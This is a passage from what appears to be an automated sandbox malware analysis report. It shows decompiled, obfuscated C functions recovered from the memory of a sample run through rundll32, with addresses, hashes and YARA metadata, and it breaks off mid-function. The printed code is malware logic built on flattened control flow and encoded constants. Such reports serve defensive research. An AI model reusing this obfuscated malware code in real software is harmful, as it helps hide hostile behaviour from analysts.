                                                                                                                      0x0035cbbe
                                                                                                                      0x0035cbc6
                                                                                                                      0x0035cbcc
                                                                                                                      0x0035cc29
                                                                                                                      0x0035cc2a
                                                                                                                      0x0035cc33
                                                                                                                      0x0035cc39
                                                                                                                      0x0035cc3b
                                                                                                                      0x00000000
                                                                                                                      0x0035cc3b
                                                                                                                      0x0035cbce
                                                                                                                      0x0035cbd4
                                                                                                                      0x0035cc15
                                                                                                                      0x00000000
                                                                                                                      0x0035cbd6
                                                                                                                      0x0035cbd8
                                                                                                                      0x0035cc73
                                                                                                                      0x0035cc79
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035cbde
                                                                                                                      0x0035cc05
                                                                                                                      0x0035cc0a
                                                                                                                      0x0035cc0f
                                                                                                                      0x0035cc11
                                                                                                                      0x00000000
                                                                                                                      0x0035cc11
                                                                                                                      0x0035cc0f
                                                                                                                      0x0035cbd8
                                                                                                                      0x0035cbd4
                                                                                                                      0x0035cc88
                                                                                                                      0x0035cc88
                                                                                                                      0x0035cc66
                                                                                                                      0x0035cc6b
                                                                                                                      0x0035cc6e
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ;<$sC
                                                                                                                      • API String ID: 0-4190640370
                                                                                                                      • Opcode ID: afae9e4ec36a9a9b8992dcbfdbb27de80e6d34688f14d12214c490c57e1a3fcd
                                                                                                                      • Instruction ID: a48bc2dc7e3008a3cc1b557da6c906dde0c46aa2ad36ce6a98e335b39238a8fa
                                                                                                                      • Opcode Fuzzy Hash: afae9e4ec36a9a9b8992dcbfdbb27de80e6d34688f14d12214c490c57e1a3fcd
                                                                                                                      • Instruction Fuzzy Hash: C27132721083819FC355CF25C48A81FBBF2FBC4758F505A1DF99686220C372DA49CB82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034777B Relevance: 2.7, Strings: 2, Instructions: 162COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0034777B(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t128;
				signed int _t149;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				void* _t158;
				signed int* _t179;
				void* _t181;
				void* _t182;

				_push(_a16);
				_t178 = _a4;
				_t179 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t128);
				_v104 = 0x8623b;
				_t182 = _t181 + 0x18;
				_v104 = _v104 + 0xffff31eb;
				_v104 = _v104 | 0x66daf122;
				_t158 = 0xd040992;
				_t152 = 0x22;
				_v104 = _v104 / _t152;
				_v104 = _v104 ^ 0x03069644;
				_v100 = 0x2bbbe;
				_t153 = 0x14;
				_v100 = _v100 * 0xf;
				_v100 = _v100 / _t153;
				_v100 = _v100 | 0x351d3417;
				_v100 = _v100 ^ 0x351dc123;
				_v72 = 0xab81ef;
				_v72 = _v72 >> 0xd;
				_v72 = _v72 ^ 0x000a49b6;
				_v76 = 0x16a933;
				_v76 = _v76 ^ 0xe7c1b086;
				_v76 = _v76 ^ 0xe7d23b20;
				_v60 = 0x52cbe;
				_t154 = 0x2d;
				_v60 = _v60 * 0x6f;
				_v60 = _v60 ^ 0x023eaa51;
				_v84 = 0x759948;
				_v84 = _v84 + 0x9b78;
				_v84 = _v84 ^ 0xc5583688;
				_v84 = _v84 ^ 0xc523a4cd;
				_v88 = 0xf8b174;
				_v88 = _v88 << 0xa;
				_v88 = _v88 | 0xb04365c9;
				_v88 = _v88 ^ 0xf2c73fc1;
				_v64 = 0x1cff55;
				_v64 = _v64 / _t154;
				_v64 = _v64 ^ 0x000b3edd;
				_v68 = 0x9a9e72;
				_v68 = _v68 + 0xffffcb3f;
				_v68 = _v68 ^ 0x009b4266;
				_v92 = 0x7b2ebb;
				_v92 = _v92 << 0xb;
				_v92 = _v92 ^ 0xf233ff82;
				_v92 = _v92 ^ 0x2b4dc82a;
				_v96 = 0x6d21c4;
				_v96 = _v96 ^ 0x8acf53c4;
				_v96 = _v96 + 0xffff3a52;
				_v96 = _v96 | 0xe5741bb4;
				_v96 = _v96 ^ 0xeff12f72;
				_v56 = 0x5c5116;
				_v56 = _v56 + 0xffff598a;
				_v56 = _v56 ^ 0x00573a27;
				_v80 = 0xae67f2;
				_v80 = _v80 + 0x56e4;
				_t155 = 0x50;
				_v80 = _v80 / _t155;
				_v80 = _v80 ^ 0x0002e359;
				do {
					while(_t158 != 0x253e674) {
						if(_t158 == 0x4f8855c) {
							E0035F88F(_t178 + 4,  &_v52, __eflags, _v96, _v56, _v80);
						} else {
							if(_t158 == 0x5caea7a) {
								E00354D91( *_t178,  &_v52, _v68, _v92);
								_t182 = _t182 + 8;
								_t158 = 0x4f8855c;
								continue;
							} else {
								if(_t158 == 0x9ad54af) {
									_push(_t158);
									_push(_t158);
									_t149 = E00353512(_t179[1]);
									 *_t179 = _t149;
									__eflags = _t149;
									if(__eflags != 0) {
										_t158 = 0x253e674;
										continue;
									}
								} else {
									if(_t158 == 0xa436207) {
										_t179[1] = E0035109E(_t178);
										_t158 = 0x9ad54af;
										continue;
									} else {
										if(_t158 != 0xd040992) {
											goto L13;
										} else {
											_t158 = 0xa436207;
											 *_t179 =  *_t179 & 0x00000000;
											_t179[1] = _v104;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t179;
						_t127 =  *_t179 != 0;
						__eflags = _t127;
						return 0 | _t127;
					}
					E003564C5(_v60, _v84, _v88, _v64, _t179,  &_v52);
					_t182 = _t182 + 0x10;
					_t158 = 0x5caea7a;
					L13:
					__eflags = _t158 - 0x12a0183;
				} while (__eflags != 0);
				goto L16;
			}



























                                                                                                                      0x00347782
                                                                                                                      0x00347789
                                                                                                                      0x00347790
                                                                                                                      0x00347792
                                                                                                                      0x00347799
                                                                                                                      0x003477a0
                                                                                                                      0x003477a1
                                                                                                                      0x003477a2
                                                                                                                      0x003477a3
                                                                                                                      0x003477a8
                                                                                                                      0x003477b0
                                                                                                                      0x003477b3
                                                                                                                      0x003477bd
                                                                                                                      0x003477c5
                                                                                                                      0x003477d0
                                                                                                                      0x003477d5
                                                                                                                      0x003477db
                                                                                                                      0x003477e3
                                                                                                                      0x003477f0
                                                                                                                      0x003477f3
                                                                                                                      0x003477ff
                                                                                                                      0x00347803
                                                                                                                      0x0034780b
                                                                                                                      0x00347813
                                                                                                                      0x0034781b
                                                                                                                      0x00347820
                                                                                                                      0x00347828
                                                                                                                      0x00347830
                                                                                                                      0x00347838
                                                                                                                      0x00347840
                                                                                                                      0x0034784d
                                                                                                                      0x0034784e
                                                                                                                      0x00347852
                                                                                                                      0x0034785a
                                                                                                                      0x00347862
                                                                                                                      0x0034786a
                                                                                                                      0x00347872
                                                                                                                      0x0034787a
                                                                                                                      0x00347882
                                                                                                                      0x00347887
                                                                                                                      0x0034788f
                                                                                                                      0x00347897
                                                                                                                      0x003478a5
                                                                                                                      0x003478a9
                                                                                                                      0x003478b1
                                                                                                                      0x003478b9
                                                                                                                      0x003478c1
                                                                                                                      0x003478c9
                                                                                                                      0x003478d1
                                                                                                                      0x003478d6
                                                                                                                      0x003478de
                                                                                                                      0x003478e6
                                                                                                                      0x003478ee
                                                                                                                      0x003478f6
                                                                                                                      0x003478fe
                                                                                                                      0x00347906
                                                                                                                      0x0034790e
                                                                                                                      0x00347916
                                                                                                                      0x0034791e
                                                                                                                      0x00347926
                                                                                                                      0x0034792e
                                                                                                                      0x0034793e
                                                                                                                      0x0034794b
                                                                                                                      0x0034794f
                                                                                                                      0x00347957
                                                                                                                      0x00347957
                                                                                                                      0x00347965
                                                                                                                      0x00347a30
                                                                                                                      0x0034796b
                                                                                                                      0x00347971
                                                                                                                      0x003479da
                                                                                                                      0x003479df
                                                                                                                      0x003479e2
                                                                                                                      0x00000000
                                                                                                                      0x00347973
                                                                                                                      0x00347979
                                                                                                                      0x003479b6
                                                                                                                      0x003479b7
                                                                                                                      0x003479bb
                                                                                                                      0x003479c0
                                                                                                                      0x003479c4
                                                                                                                      0x003479c6
                                                                                                                      0x003479c8
                                                                                                                      0x00000000
                                                                                                                      0x003479c8
                                                                                                                      0x0034797b
                                                                                                                      0x0034797d
                                                                                                                      0x003479a0
                                                                                                                      0x003479a3
                                                                                                                      0x00000000
                                                                                                                      0x0034797f
                                                                                                                      0x00347985
                                                                                                                      0x00000000
                                                                                                                      0x0034798b
                                                                                                                      0x0034798f
                                                                                                                      0x00347991
                                                                                                                      0x00347994
                                                                                                                      0x00000000
                                                                                                                      0x00347994
                                                                                                                      0x00347985
                                                                                                                      0x0034797d
                                                                                                                      0x00347979
                                                                                                                      0x00347971
                                                                                                                      0x00347a38
                                                                                                                      0x00347a3a
                                                                                                                      0x00347a3f
                                                                                                                      0x00347a3f
                                                                                                                      0x00347a46
                                                                                                                      0x00347a46
                                                                                                                      0x00347a02
                                                                                                                      0x00347a07
                                                                                                                      0x00347a0a
                                                                                                                      0x00347a0f
                                                                                                                      0x00347a0f
                                                                                                                      0x00347a0f
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ':W$V
                                                                                                                      • API String ID: 0-741684166
                                                                                                                      • Opcode ID: 9df797d2c0240c8d82362af42228f8b3359936822f393b3d4966278af40eae7f
                                                                                                                      • Instruction ID: a7f47199b6b194dccfab4317e949215f5bbcd476ae0b5571e46f06f7a6cf1809
                                                                                                                      • Opcode Fuzzy Hash: 9df797d2c0240c8d82362af42228f8b3359936822f393b3d4966278af40eae7f
                                                                                                                      • Instruction Fuzzy Hash: 7D6155B5109342AFC769CF21C48A91FBBF1FBC8358F50991CF5DA9A260D3759A098F42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035EBFF Relevance: 2.6, Strings: 2, Instructions: 129COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0035EBFF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t91;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				void* _t114;
				void* _t116;
				void* _t131;
				void* _t132;

				_push(_a12);
				_t131 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t91);
				_v28 = 0x7108be;
				_v28 = _v28 + 0x734d;
				_v28 = _v28 + 0xa8e4;
				_t132 = 0;
				_v28 = _v28 + 0xffff8493;
				_t114 = 0xcca5bf9;
				_v28 = _v28 ^ 0x0074778b;
				_v20 = 0xc2a60c;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x558996ec;
				_v20 = _v20 ^ 0x55851de9;
				_v12 = 0x41ee29;
				_t21 =  &_v12; // 0x41ee29
				_t109 = 0x29;
				_v12 =  *_t21 * 0x26;
				_v12 = _v12 ^ 0x09c82f39;
				_v32 = 0x1f5650;
				_v32 = _v32 >> 1;
				_v32 = _v32 / _t109;
				_v32 = _v32 ^ 0xe76a4887;
				_v32 = _v32 ^ 0xe76186a0;
				_v36 = 0x15f4a6;
				_v36 = _v36 | 0x84842460;
				_v36 = _v36 + 0x9b66;
				_t110 = 0x43;
				_v36 = _v36 / _t110;
				_v36 = _v36 ^ 0x01f36aaa;
				_v4 = 0xe58fa8;
				_v4 = _v4 >> 0xf;
				_v4 = _v4 ^ 0x0008ca28;
				_v8 = 0x294ac3;
				_v8 = _v8 + 0xffff78db;
				_v8 = _v8 ^ 0x0024bdda;
				_v16 = 0xcf6d8f;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0x1116;
				_v16 = _v16 ^ 0x000942b4;
				_v24 = 0xd07c42;
				_v24 = _v24 | 0x50b68ca9;
				_t111 = 0x74;
				_v24 = _v24 / _t111;
				_v24 = _v24 << 3;
				_v24 = _v24 ^ 0x05925fb7;
				while(_t114 != 0x2cca53b) {
					if(_t114 == 0x3850c59) {
						E003468DE(_v4, _v8, _v16, _v24,  *0x365214);
					} else {
						if(_t114 == 0xcca5bf9) {
							_push(_t114);
							_push(_t114);
							_t116 = 0x50;
							 *0x365214 = E00353512(_t116);
							_t114 = 0xd9a7a55;
							continue;
						} else {
							if(_t114 == 0xd96b1a6) {
								_t132 = E0035EE11(_t131, _v32, _v36, _a8);
								if(_t132 == 0) {
									_t114 = 0x2cca53b;
									continue;
								}
							} else {
								if(_t114 != 0xd9a7a55) {
									L12:
									if(_t114 != 0xca68b5e) {
										continue;
									} else {
									}
								} else {
									if(E00360D5B() != 0) {
										_t114 = 0xd96b1a6;
										continue;
									}
								}
							}
						}
					}
					return _t132;
				}
				E00346D80();
				_t114 = 0x3850c59;
				goto L12;
			}




















                                                                                                                      0x0035ec06
                                                                                                                      0x0035ec0a
                                                                                                                      0x0035ec0c
                                                                                                                      0x0035ec10
                                                                                                                      0x0035ec14
                                                                                                                      0x0035ec15
                                                                                                                      0x0035ec16
                                                                                                                      0x0035ec1b
                                                                                                                      0x0035ec26
                                                                                                                      0x0035ec30
                                                                                                                      0x0035ec38
                                                                                                                      0x0035ec3a
                                                                                                                      0x0035ec42
                                                                                                                      0x0035ec47
                                                                                                                      0x0035ec54
                                                                                                                      0x0035ec5c
                                                                                                                      0x0035ec61
                                                                                                                      0x0035ec69
                                                                                                                      0x0035ec71
                                                                                                                      0x0035ec79
                                                                                                                      0x0035ec80
                                                                                                                      0x0035ec83
                                                                                                                      0x0035ec87
                                                                                                                      0x0035ec8f
                                                                                                                      0x0035ec97
                                                                                                                      0x0035eca3
                                                                                                                      0x0035eca7
                                                                                                                      0x0035ecaf
                                                                                                                      0x0035ecb7
                                                                                                                      0x0035ecbf
                                                                                                                      0x0035ecc7
                                                                                                                      0x0035ecd3
                                                                                                                      0x0035ecd8
                                                                                                                      0x0035ecde
                                                                                                                      0x0035ece6
                                                                                                                      0x0035ecee
                                                                                                                      0x0035ecf3
                                                                                                                      0x0035ecfb
                                                                                                                      0x0035ed03
                                                                                                                      0x0035ed0b
                                                                                                                      0x0035ed13
                                                                                                                      0x0035ed1b
                                                                                                                      0x0035ed20
                                                                                                                      0x0035ed28
                                                                                                                      0x0035ed30
                                                                                                                      0x0035ed38
                                                                                                                      0x0035ed44
                                                                                                                      0x0035ed4c
                                                                                                                      0x0035ed50
                                                                                                                      0x0035ed55
                                                                                                                      0x0035ed5d
                                                                                                                      0x0035ed63
                                                                                                                      0x0035edff
                                                                                                                      0x0035ed69
                                                                                                                      0x0035ed6f
                                                                                                                      0x0035edbc
                                                                                                                      0x0035edbd
                                                                                                                      0x0035edc0
                                                                                                                      0x0035edc8
                                                                                                                      0x0035edcd
                                                                                                                      0x00000000
                                                                                                                      0x0035ed71
                                                                                                                      0x0035ed77
                                                                                                                      0x0035eda4
                                                                                                                      0x0035edaa
                                                                                                                      0x0035edac
                                                                                                                      0x00000000
                                                                                                                      0x0035edac
                                                                                                                      0x0035ed79
                                                                                                                      0x0035ed7f
                                                                                                                      0x0035eddb
                                                                                                                      0x0035ede1
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035ede7
                                                                                                                      0x0035ed81
                                                                                                                      0x0035ed88
                                                                                                                      0x0035ed8a
                                                                                                                      0x00000000
                                                                                                                      0x0035ed8a
                                                                                                                      0x0035ed88
                                                                                                                      0x0035ed7f
                                                                                                                      0x0035ed77
                                                                                                                      0x0035ed6f
                                                                                                                      0x0035ee10
                                                                                                                      0x0035ee10
                                                                                                                      0x0035edd4
                                                                                                                      0x0035edd9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )A$Ms
                                                                                                                      • API String ID: 0-3843022149
                                                                                                                      • Opcode ID: bf2df44adc702e07f2bcf22b91734695c00a888ad4f976129d6493cef633cfc5
                                                                                                                      • Instruction ID: 27e8e0417e6cf8092bd9f11b63c29d0465864a4c732d1d85a9bc02e5b531c53b
                                                                                                                      • Opcode Fuzzy Hash: bf2df44adc702e07f2bcf22b91734695c00a888ad4f976129d6493cef633cfc5
                                                                                                                      • Instruction Fuzzy Hash: 7A5166725093019FC759CF25D88A81BBBF1FBC8758F018A1DF9959A260D371DA4A8F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00353D41 Relevance: 2.6, Strings: 2, Instructions: 127COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00353D41(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t102;
				void* _t110;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t132;
				signed int _t133;
				signed int* _t136;

				_t131 = _a8;
				_t117 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t102);
				_v64 = 0x9e44de;
				_t136 =  &(( &_v100)[4]);
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x000cb772;
				_t132 = 0;
				_v84 = 0x342048;
				_t119 = 0x9e632dd;
				_v84 = _v84 << 2;
				_t133 = 0x77;
				_v84 = _v84 / _t133;
				_v84 = _v84 ^ 0x00050c4a;
				_v68 = 0xcb0a16;
				_v68 = _v68 * 0x2c;
				_v68 = _v68 ^ 0x22ee5bf9;
				_v88 = 0x6d370;
				_v88 = _v88 << 2;
				_v88 = _v88 + 0xffff4ba7;
				_v88 = _v88 ^ 0x0017e1fc;
				_v96 = 0xa9311c;
				_v96 = _v96 + 0x677e;
				_v96 = _v96 << 6;
				_v96 = _v96 >> 1;
				_v96 = _v96 ^ 0x1536caa9;
				_v92 = 0x3ec146;
				_v92 = _v92 >> 1;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x01fa5034;
				_v100 = 0xc8b468;
				_v100 = _v100 + 0xabff;
				_v100 = _v100 + 0x496c;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x064ce6e5;
				_v72 = 0x40c3e5;
				_v72 = _v72 + 0xe4b1;
				_v72 = _v72 ^ 0x00481562;
				_v76 = 0xf7b9fc;
				_v76 = _v76 ^ 0x04753abe;
				_v76 = _v76 >> 8;
				_v76 = _v76 ^ 0x00058483;
				_v56 = 0xab3e00;
				_v56 = _v56 * 0x42;
				_v56 = _v56 ^ 0x2c2f6e9b;
				_v80 = 0x8577d2;
				_v80 = _v80 | 0xb985653c;
				_v80 = _v80 << 0xe;
				_v80 = _v80 ^ 0x5dfa230b;
				_v60 = 0xdce2c4;
				_v60 = _v60 | 0x5395b845;
				_v60 = _v60 ^ 0x53d3ec0c;
				while(_t119 != 0x979dba8) {
					if(_t119 == 0x9e632dd) {
						_t119 = 0xa2b72cf;
						continue;
					} else {
						if(_t119 == 0xa2b72cf) {
							E003564C5(_v64, _v84, _v68, _v88, _t117,  &_v52);
							_t136 =  &(_t136[4]);
							_t119 = 0xe5d0333;
							continue;
						} else {
							if(_t119 != 0xe5d0333) {
								L10:
								__eflags = _t119 - 0xfc63b9d;
								if(__eflags != 0) {
									continue;
								}
							} else {
								_t115 = E0034B09F(_v96, _v92,  &_v52, _v100, _t131 + 0xc, _v72);
								_t136 =  &(_t136[4]);
								if(_t115 != 0) {
									_t119 = 0x979dba8;
									continue;
								}
							}
						}
					}
					return _t132;
				}
				_t110 = E0035B9B1(_v76, _v56, __eflags, _t131 + 0x10, _v80,  &_v52, _v60);
				_t136 =  &(_t136[4]);
				__eflags = _t110;
				_t132 =  !=  ? 1 : _t132;
				_t119 = 0xfc63b9d;
				goto L10;
			}
























                                                                                                                      0x00353d48
                                                                                                                      0x00353d4c
                                                                                                                      0x00353d4e
                                                                                                                      0x00353d4f
                                                                                                                      0x00353d53
                                                                                                                      0x00353d54
                                                                                                                      0x00353d55
                                                                                                                      0x00353d5a
                                                                                                                      0x00353d62
                                                                                                                      0x00353d65
                                                                                                                      0x00353d6c
                                                                                                                      0x00353d74
                                                                                                                      0x00353d76
                                                                                                                      0x00353d7e
                                                                                                                      0x00353d83
                                                                                                                      0x00353d8e
                                                                                                                      0x00353d96
                                                                                                                      0x00353d9a
                                                                                                                      0x00353da2
                                                                                                                      0x00353daf
                                                                                                                      0x00353db3
                                                                                                                      0x00353dbb
                                                                                                                      0x00353dc3
                                                                                                                      0x00353dc8
                                                                                                                      0x00353dd0
                                                                                                                      0x00353dd8
                                                                                                                      0x00353de0
                                                                                                                      0x00353de8
                                                                                                                      0x00353ded
                                                                                                                      0x00353df1
                                                                                                                      0x00353df9
                                                                                                                      0x00353e01
                                                                                                                      0x00353e05
                                                                                                                      0x00353e0a
                                                                                                                      0x00353e12
                                                                                                                      0x00353e1a
                                                                                                                      0x00353e22
                                                                                                                      0x00353e2a
                                                                                                                      0x00353e2f
                                                                                                                      0x00353e37
                                                                                                                      0x00353e3f
                                                                                                                      0x00353e47
                                                                                                                      0x00353e4f
                                                                                                                      0x00353e57
                                                                                                                      0x00353e5f
                                                                                                                      0x00353e64
                                                                                                                      0x00353e6c
                                                                                                                      0x00353e79
                                                                                                                      0x00353e7d
                                                                                                                      0x00353e85
                                                                                                                      0x00353e8d
                                                                                                                      0x00353e95
                                                                                                                      0x00353e9a
                                                                                                                      0x00353ea2
                                                                                                                      0x00353eaa
                                                                                                                      0x00353eb2
                                                                                                                      0x00353eba
                                                                                                                      0x00353ec4
                                                                                                                      0x00353f28
                                                                                                                      0x00000000
                                                                                                                      0x00353ec6
                                                                                                                      0x00353ecc
                                                                                                                      0x00353f19
                                                                                                                      0x00353f1e
                                                                                                                      0x00353f21
                                                                                                                      0x00000000
                                                                                                                      0x00353ece
                                                                                                                      0x00353ed4
                                                                                                                      0x00353f5d
                                                                                                                      0x00353f5d
                                                                                                                      0x00353f63
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00353eda
                                                                                                                      0x00353ef3
                                                                                                                      0x00353ef8
                                                                                                                      0x00353efd
                                                                                                                      0x00353eff
                                                                                                                      0x00000000
                                                                                                                      0x00353eff
                                                                                                                      0x00353efd
                                                                                                                      0x00353ed4
                                                                                                                      0x00353ecc
                                                                                                                      0x00353f72
                                                                                                                      0x00353f72
                                                                                                                      0x00353f48
                                                                                                                      0x00353f4f
                                                                                                                      0x00353f53
                                                                                                                      0x00353f55
                                                                                                                      0x00353f58
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: lI$~g
                                                                                                                      • API String ID: 0-567424089
                                                                                                                      • Opcode ID: 423323af2e26e23c72106b1dc1ca73f18f5a7f0c7bd7cdbd74780325d6629f41
                                                                                                                      • Instruction ID: ae7a43e1f327d8ffd48074209a6b5a9830ea0a1e88a1de84f34c8516e80b8672
                                                                                                                      • Opcode Fuzzy Hash: 423323af2e26e23c72106b1dc1ca73f18f5a7f0c7bd7cdbd74780325d6629f41
                                                                                                                      • Instruction Fuzzy Hash: 475135B25083419FC749CF25C88A81BBBF5FBD4788F504A1DF99696260C375CA09CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00346A1F Relevance: 2.6, Strings: 2, Instructions: 126COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00346A1F(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t133;
				void* _t137;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				intOrPtr _t158;
				intOrPtr* _t159;
				intOrPtr* _t160;
				void* _t161;

				_t158 =  *0x365c94; // 0x0
				_v8 = 0x584755;
				_t137 = __ecx;
				_t2 =  &_v8; // 0x584755
				_t159 = _t158 + 0x230;
				_t139 = 0x64;
				_v8 =  *_t2 * 0x67;
				_v8 = _v8 + 0xffff4b67;
				_v8 = _v8 ^ 0xe76daef6;
				_v8 = _v8 ^ 0xc4ee506c;
				_v28 = 0x9e8b87;
				_v28 = _v28 + 0x75d;
				_v28 = _v28 / _t139;
				_v28 = _v28 ^ 0x00079f8c;
				_v24 = 0xc311ab;
				_v24 = _v24 + 0xffffbeea;
				_v24 = _v24 | 0xf92f35a0;
				_v24 = _v24 ^ 0xf9e35170;
				_v44 = 0x977698;
				_v44 = _v44 + 0x51f5;
				_v44 = _v44 ^ 0x0096f96a;
				_v32 = 0xe7cab8;
				_v32 = _v32 | 0xaa1208f4;
				_t140 = 0x17;
				_v32 = _v32 / _t140;
				_v32 = _v32 ^ 0x076e046c;
				_v12 = 0x2eec3f;
				_v12 = _v12 + 0xffffb819;
				_v12 = _v12 + 0xffff37c9;
				_t141 = 0x68;
				_v12 = _v12 / _t141;
				_v12 = _v12 ^ 0x000eef91;
				_v56 = 0x530307;
				_v56 = _v56 | 0x0fbda9c8;
				_v56 = _v56 ^ 0x0ffdd502;
				_v52 = 0x5d35c5;
				_v52 = _v52 + 0xd27c;
				_v52 = _v52 ^ 0x0055f8de;
				_v48 = 0x6ef6d5;
				_v48 = _v48 >> 1;
				_v48 = _v48 ^ 0x0035703d;
				_v16 = 0x82f5d;
				_v16 = _v16 << 0xd;
				_v16 = _v16 + 0xa18d;
				_v16 = _v16 + 0xffffcd20;
				_v16 = _v16 ^ 0x05eb1b3e;
				_v20 = 0xcf26b;
				_v20 = _v20 | 0xbebffeb7;
				_v20 = _v20 ^ 0xbebf7f31;
				_v60 = 0x60d0b7;
				_v60 = _v60 >> 2;
				_v60 = _v60 ^ 0x0017c790;
				_v40 = 0xb2c22;
				_v40 = _v40 ^ 0x2c2f8cde;
				_v40 = _v40 + 0xffffbcf4;
				_v40 = _v40 ^ 0x2c2f98f1;
				_v36 = 0x14b711;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 | 0x6b3fd2c1;
				_v36 = _v36 ^ 0x6b3a1312;
				while(1) {
					_t160 =  *_t159;
					if(_t160 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t160 + 0x30)) == 0) {
						L4:
						 *_t159 =  *_t160;
						_t133 = E003468DE(_v20, _v60, _v40, _v36, _t160);
						_t161 = _t161 + 0xc;
					} else {
						_t133 = E00345E0B( *((intOrPtr*)(_t160 + 0x24)), _t137, _v28, _v24);
						if(_t133 != _v8) {
							_t159 = _t160;
						} else {
							 *((intOrPtr*)(_t160 + 0xc))( *((intOrPtr*)(_t160 + 0x30)), 0, 0);
							E0034F88A(_v44, _v32, _v12,  *((intOrPtr*)(_t160 + 0x30)));
